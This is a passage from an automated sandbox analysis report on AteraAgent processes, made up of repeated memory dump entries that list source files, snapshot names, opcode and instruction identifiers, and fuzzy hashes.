                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f2d43af62ab15e48410335f02b621236cbbed0b9c49ce6d959f50298c69c240c
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d6cb84657d44fd822c488ce0d0bcc094d382d08ec26a721402c1bcf6445d7550
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2d43af62ab15e48410335f02b621236cbbed0b9c49ce6d959f50298c69c240c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA019632A0F9CA5FE775DBA548241B976A0FF56201B5904BED4BC8B0A3D915FE05C280
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3075c4f0cc446113d5c5e131292968f7f34c8b251fd10711e493e2a349132c63
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ce7106dc9d9c9b0a85f3bd03bc18f19fed7265df29278bd94749883a65ca3c6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3075c4f0cc446113d5c5e131292968f7f34c8b251fd10711e493e2a349132c63
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2801263160EB880FD356AB34C8299A17FF0EF9724030A05FBC449CF1B3D929A946C381
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: dab39d1d87553a3f458377a6e31628a72271db21085c01a1bf842812a0c444b7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: c9a9724fa12048240668849b2ddffd49d03d31404ac1149a64d1f77b76218df3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dab39d1d87553a3f458377a6e31628a72271db21085c01a1bf842812a0c444b7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0443160DA454FE358BA38D0A55E137D0DF46219B1405BBD08DCA1A7EE25A8828385
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 324036046b385c13efc2429df581508075e49803d3811e4cfd3edc1e6a562dd9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 37dea2f2333a8c0836ad4ce1d269b5644e9bd14df7b46dd854a414f8c7e54a69
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 324036046b385c13efc2429df581508075e49803d3811e4cfd3edc1e6a562dd9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0E231709A094FE794BA39C0595A173D1EF9A355B1105BBD40DCA2B5ED26F8828385
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.1794139795.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_7ffd9b600000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 57b05956c02021be0578b202ba6c04855f744095daa175d76f9bc3a4ab95245f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FA00202BCB46E01D45420DF79520D9B644C786171BC66572ED5D8815A988E2AD60285
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: dK_H
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2901103952
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70606bb6ac7cb4706580d5a063f9730d193285cf326e20d5d419f454035fb4a9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 538aa308c95347480793c350393eb5479593e2cdea5002053226a732305b41c1
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70606bb6ac7cb4706580d5a063f9730d193285cf326e20d5d419f454035fb4a9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A12E53070DA494FD769EB28C4A46B57BE1FF95300F0541BAD49ECB2A6CE34B946C781
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b8b4c161e5523561435494aa35a7788743ac2574e9559b2760258092b8c86b1
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 38b34c09ffb4049291ffc71e149dd0cb0abaf25d6ce9a901d1e4de13b395449c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b8b4c161e5523561435494aa35a7788743ac2574e9559b2760258092b8c86b1
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CD11131B1CB494BD728EB58D4915B5B3E0FF95314B1446BED09EC72A6CE36F8428B81
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: abc936b0a6ea1ac40c0198f207b0d68df30ded82daa702a5f15bd8e89d647253
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a446ee3ba8b1b5cdebe743c3ef0202a590588597c7913a3219242822b11c1d30
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abc936b0a6ea1ac40c0198f207b0d68df30ded82daa702a5f15bd8e89d647253
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63B1F33071DB098FD768DB08D491639B3E1FF99710B144A7DD09AC76AADA35F8438B81
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: AWAV
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-7688948
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 588593781f5df02e3194cada6f4eb6bedadb54108f0344de402a310959ba0dbf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 95925b665e87183e4b529e9797213664ffc914f4a7cd0cc59f22e240889c2f08
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 588593781f5df02e3194cada6f4eb6bedadb54108f0344de402a310959ba0dbf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1A1B530A2DF8D8FD7A8EB688054BA9B7E0FF59300F1505B9D49DC72A2DE34E8458741
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: BK_H
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-699573682
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e1da840a510d9b6d2963a0d04ee4e9683bc3bcc178114bd9ff3aa70bf5d49e7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 11d2e683d049fbb2593c9908981984aac7182c27f28081bf55e70e5ead0f6bfc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e1da840a510d9b6d2963a0d04ee4e9683bc3bcc178114bd9ff3aa70bf5d49e7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57A1F671A09A8D4FDB95DFAC88A46A97BF1FF59300F0501B6E459CB2A6CA34BD06C740
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: 'R_L
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-835780197
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a3749530159fb82018a51c0d1988aa3f6ef9708fade2aa44b8d131e6d49b39f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 24ead042a6962ff736a4bba1dd450275644422f279ad6ad7488f2039e2316fd5
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bade8068b3efdc6f45e7199a2fec14f21672b2812f0ee888746b2e38ee87c29
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF10770B0DB8D4FE7A8EB188465A75B7D2FFA9300F05457DE09DCB2A6DE24B8418742
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c6fc8a666c7cff9a58081efb96ac3e256007e9b3aa83a24cfbd35fb236b84ca9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: e4dccde3b4d243bfd0ce09a1beddc18f6da38b36c478bf9281a461b90edea252
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6fc8a666c7cff9a58081efb96ac3e256007e9b3aa83a24cfbd35fb236b84ca9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE14B30A09A4D8FDF94EF58C4A4AA937E2FFAC744F150169E44DD73A6CA35E941CB80
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ea8d9ee44b21ae50f975b148b8a481251d96ffae9aa970c64c14ace109b87c7
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f3d3072f204cc5346ec6072190eb3a4c5ab25b87cea38917a368e23f6bc2bea6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ea8d9ee44b21ae50f975b148b8a481251d96ffae9aa970c64c14ace109b87c7
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAD1B571B09A4D4FEBA8EB5C88657B877E1FF58700F1440BAD44DC32A6DE34AD818B41
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 761316e5edaa331b1815f7b1ffe0d27b8e0925bed0bea09eccb07c24ef912924
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a5dd643b5602ee88e441dd1d13700712c0f21e7af46ce53a1ea099a5dba32911
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 761316e5edaa331b1815f7b1ffe0d27b8e0925bed0bea09eccb07c24ef912924
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DD10971B0ED9E4FEB95DB6884A17B87BE2EF99710B0501BAD49DCB2E7DD1478028340
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 12c8aac051655238402304bf44515e7fe1e1222d03fb72015e26bcb8445252ac
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 292a2fe75a5919176d78d12887ccbd0204c5f0e62921dcbf4dbbe165c296307a
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c8aac051655238402304bf44515e7fe1e1222d03fb72015e26bcb8445252ac
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8D1433170DB4D4FEB68DB58D455AA5B7E0EFA5310F05027ED08DCB2A2DE26F8468782
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: fa042af7dc6212527fdbb565695866ee2bc86ef58ac0a35a5f469ba049aa5521
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: d4b963272b4fd17c877d900cbe55fbea8e33f7a658f9bd8510e8ba8235bd18ea
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa042af7dc6212527fdbb565695866ee2bc86ef58ac0a35a5f469ba049aa5521
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDD1AF30B1EE4D9FEBA8DB1884A577977D2EF99300F15057DE09ECB2A2DE24B8418741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: bfba7311bf9ce68bc2fe264f03c90541d85896b3e9f74cbf4aa049b2357a2749
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7a382ec15475291e9c7625e524e58e1e3bdc5e759a85260ba3dc22f196b1544e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfba7311bf9ce68bc2fe264f03c90541d85896b3e9f74cbf4aa049b2357a2749
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9AC1F521B19E4F4FEBAC9B6C84A56B573D2FFA8340B4501B9D01EC72E6DE24F9458780
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA1E531B0DF4C5FEB68DB5C98966B977E2FF99310F04017EE04AC72A2DA25B8418781
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f6b227028f3c9dd6f0078b633363a4536b034f1fb881604696655705bd1427cf
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 006d85bdece68ec5c16089405081c0e43de3a115c909ef815bfbcbedb38fa232
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6b227028f3c9dd6f0078b633363a4536b034f1fb881604696655705bd1427cf
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA16B32A0DB471BEB18EFBCE8A19F13790EF4532571C427AD18D86297DF25B84682C4
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ee86b2ef9c5f16191d23ca262993c8cb5cba68e89e97a03848ffc00e7d5f2067
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f4fee59275f250d74249ec2b879c5b5d79df1c1ff945a78206a790cad0c9eda8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee86b2ef9c5f16191d23ca262993c8cb5cba68e89e97a03848ffc00e7d5f2067
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0A1072070DE490FEBA5EBA8986077577E2EF85320B5542BAC09DCB1E7CA19B9468341
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cc4dc99822032c167cb087b09d12fcc688aaf3b529625ae230318e60472b40af
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 61562110edaf266123b5fc09dd710dd28e7f29d489d52847ccd31caf24cb74d4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc4dc99822032c167cb087b09d12fcc688aaf3b529625ae230318e60472b40af
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBA14B3170EA8A4FE7A5DB5C88616B47BD1EF99310F0505FAD098CB2A7C918BC068381
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f9e5eb62ed8eb1718282216c6a7af3bcdfa2982e240cd9aecb8db29d01770f48
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cc5c88b510e171e0a3d058eebffa8a3b799ad4c852b5c43aa62e9ef9ec2c85e4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9e5eb62ed8eb1718282216c6a7af3bcdfa2982e240cd9aecb8db29d01770f48
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAA1013170DF498FEB69DB6CC4A0A7173E1EF55314B1506B9D09ECB2A6CA26F842C780
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3dda0d66bcc9b27d60101092ec5e58bfa646f1144d8ee055dee8872594ae7866
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0f781501686d4f1883bd8eab9f6ab2f05e332c74e9f03799c224dc9e676ebcce
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dda0d66bcc9b27d60101092ec5e58bfa646f1144d8ee055dee8872594ae7866
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32C10A70E0961D8FEB95DF98C494BBDBBB1FF59300F1541A9D01DE72A5CA34A981CB00
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
